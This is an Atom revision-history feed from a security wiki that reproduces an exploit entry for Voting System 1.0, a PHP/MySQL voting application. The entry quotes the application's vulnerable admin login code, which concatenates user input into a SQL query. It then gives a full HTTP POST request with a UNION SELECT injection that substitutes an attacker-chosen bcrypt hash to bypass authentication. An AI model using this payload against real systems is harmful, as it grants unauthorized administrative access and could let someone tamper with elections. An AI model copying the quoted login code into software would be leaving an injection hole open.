https://pwnwiki.com/index.php?action=history&feed=atom&title=Voting_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E
Voting System 1.0 身份驗證繞過漏洞 - Revision history
2026-04-11T21:24:08Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Voting_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=2725&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) # Date: 06/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com..."
2021-05-08T02:03:18Z
<p>Created page with "==EXP== <pre> # Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) # Date: 06/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI)<br />
# Date: 06/05/2021<br />
# Exploit Author: secure77<br />
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html<br />
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code<br />
# Version: 1.0<br />
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB<br />
<br />
You can simply bypass the /admin/login.php with the following sql injection.<br />
All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing<br />
<br />
<br />
<br />
########################### Vulnerable code ############################<br />
if(isset($_POST['login'])){<br />
$username = $_POST['username'];<br />
$password = $_POST['password'];<br />
<br />
$sql = "SELECT * FROM admin WHERE username = '$username'";<br />
$query = $conn->query($sql);<br />
<br />
if($query->num_rows < 1){<br />
$_SESSION['error'] = 'Cannot find account with the username';<br />
}<br />
else{<br />
$row = $query->fetch_assoc();<br />
echo "DB Password: " . $row['password'];<br />
echo "<br>";<br />
echo "<br>";<br />
echo "Input Password: " . $password;<br />
if(password_verify($password, $row['password'])){<br />
echo "Equal";<br />
$_SESSION['admin'] = $row['id'];<br />
}<br />
else{<br />
echo "not Equal";<br />
$_SESSION['error'] = 'Incorrect password';<br />
}<br />
}<br />
<br />
}<br />
else{<br />
$_SESSION['error'] = 'Input admin credentials first';<br />
}<br />
<br />
########################### Payload ############################<br />
POST /admin/login.php HTTP/1.1<br />
Host: 192.168.1.1<br />
DNT: 1<br />
Upgrade-Insecure-Requests: 1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7<br />
Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff<br />
Connection: close<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 167<br />
<br />
login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -<br />
<br />
</pre></div>
Pwnwiki